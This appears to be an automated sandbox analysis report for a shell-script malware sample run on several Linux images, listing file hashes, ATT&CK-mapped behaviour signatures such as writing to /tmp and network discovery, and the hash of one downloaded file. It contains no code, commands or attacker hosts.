Analysis
max time kernel: 28s
max time network: 132s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 25/10/2024, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsel-20240611-en
General
Target: 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Size: 10KB
MD5: 5162438af338945d51bf275a08c71d1b
SHA1: 08afc256b7a2d67ce5d019cf6633b8ac69ecf749
SHA256: 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
SHA512: f106888effaf28760884756fafc0f9eaa435bcca7312c118cd9de9e6247c65cbc3568f3483e66eb553e80c73a4279c99136513d3500b4b2bef751dc2d1839d32
SSDEEP: 96:XNhHXJX740n2TT9740rA10KKNDcgQ9Jok:XNhHXJ740n2h40X10
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97